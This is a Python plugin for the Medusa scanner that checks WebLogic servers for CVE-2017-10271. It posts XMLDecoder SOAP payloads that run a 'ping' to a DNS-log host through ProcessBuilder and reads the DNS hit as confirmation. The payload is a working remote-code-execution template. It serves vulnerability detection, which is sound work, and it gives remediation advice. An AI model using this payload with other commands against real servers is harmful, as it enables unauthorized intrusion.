#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ascotbe'
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling,Dnslog
import urllib3
import requests
import time
# Silence urllib3's InsecureRequestWarning process-wide. medusa() below posts with
# verify=False, so without this every probe would print a certificate warning.
# NOTE(review): this affects every requests/urllib3 call in the process, not just
# this plugin — certificate validation of the scanner's own traffic is off and
# nothing will flag it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    """Metadata record for the CVE-2017-10271 plugin.

    Everything VulnerabilityDetails needs to write a finding is gathered
    into the ``info`` dict: static plugin/vulnerability attributes plus the
    scan result text handed in as ``Medusa``.
    """

    def __init__(self, Medusa):
        # Field notes (kept from the original plugin template):
        #   number      - CVE id; 0 when there is neither a CVE nor a CNVD id
        #                 (a CVE id takes priority over a CNVD id)
        #   author      - plugin author
        #   create_date - date the plugin was written
        #   disclosure  - vulnerability disclosure date (falls back to the
        #                 plugin's creation date when unknown)
        #   algroup     - plugin name
        #   name        - vulnerability name
        #   affects     - affected component
        #   desc_content- vulnerability description
        #   rank        - severity
        #   version     - affected versions
        #   suggest     - remediation advice
        #   details     - scan result text produced by medusa()
        self.info = {
            'number': "CVE-2017-10271",
            'author': "Ascotbe",
            'create_date': "2020-6-2",
            'disclosure': '2017-12-22',
            'algroup': "WebLogicXMLDecoderDeserializationVulnerability",
            'name': 'WebLogicXMLDecoder反序列化漏洞',
            'affects': "Weblogic",
            'desc_content': "OracleFusionMiddleware中的WebLogicServer组件的WLSSecurity子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行，攻击者只需要发送精心构造的HTTP请求，就可以拿到目标服务器的权限",
            'rank': "高危",
            'version': "WebLogicServer10.3.6.0.0版本\r\nWebLogicServer12.1.3.0.0版本\r\nWebLogicServer12.2.1.1.0版本",
            'suggest': "升级最新Weblogic版本",
            'details': Medusa,
        }


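def medusa(**kwargs)->None:
    """Check a target for CVE-2017-10271 (WebLogic WLS-WSAT XMLDecoder deserialization).

    Two XMLDecoder probe documents (one for a Linux shell, one for cmd.exe) are
    POSTed as ``text/xml`` to ``/wls-wsat/CoordinatorPortType``.  Each probe only
    runs ``ping <dnslog host>``; the Dnslog helper is then asked whether the
    unique host embedded in the probe was resolved, and a resolution is taken
    as confirmation.  A confirmed finding is written through VulnerabilityDetails
    and WriteFile; any exception is routed to ErrorHandling and ErrorLog.

    Detection note: the request signature is a text/xml POST to
    ``/wls-wsat/CoordinatorPortType`` whose SOAP header carries a
    ``work:WorkContext`` element wrapping ``java.beans.XMLDecoder`` /
    ``java.lang.ProcessBuilder`` — the remediation the plugin records is to
    upgrade WebLogic (see VulnerabilityInfo.info['suggest']).

    Keyword Args:
        Url: target base URL; the probe path is appended to it as-is.
        Headers: request headers.  Copied before ``Content-Type`` is set so the
            caller's dict is not modified; ``None`` is treated as empty.
        Proxies: requests-style proxies mapping, or ``None``.

    Returns:
        None.  Results and errors are recorded through the project writer classes.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    DL = Dnslog()
    # Both probes execute only `ping {dnslog host}`; the resulting DNS lookup is
    # the out-of-band signal that the XMLDecoder chain ran on the target.
    linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
    windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>C:\Windows\System32\cmd.exe</string>
              </void>
              <void index="1">
                <string>/c</string>
              </void>
              <void index="2">
                <string>ping {}</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
    payload = '/wls-wsat/CoordinatorPortType'
    # Work on a copy: the original wrote Content-Type into the caller's Headers
    # dict (and raised TypeError when Headers was None), leaking state into any
    # later plugin that reuses the same dict.
    request_headers = dict(Headers or {})
    request_headers["Content-Type"] = "text/xml"
    for data in [linux_data, windows_data]:
        try:
            payload_url = url + payload
            resp = requests.post(payload_url, headers=request_headers, data=data, proxies=proxies, timeout=6, verify=False)
            con = resp.text
            # Give the out-of-band DNS lookup time to reach the DNS-log service
            # before asking whether it arrived.
            time.sleep(4)
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url, data, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # record the finding with the response
                WriteFile().result(str(url), str(Medusa))  # url is the per-target file name, Medusa the result text
                # One confirmation is enough: stop so the second probe is not sent
                # and the same DNS-log hit is not reported a second time.
                break
        except Exception as e:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin_name)
            # str(url) keeps the error path itself from raising when Url is missing.
            ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + str(url), e)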

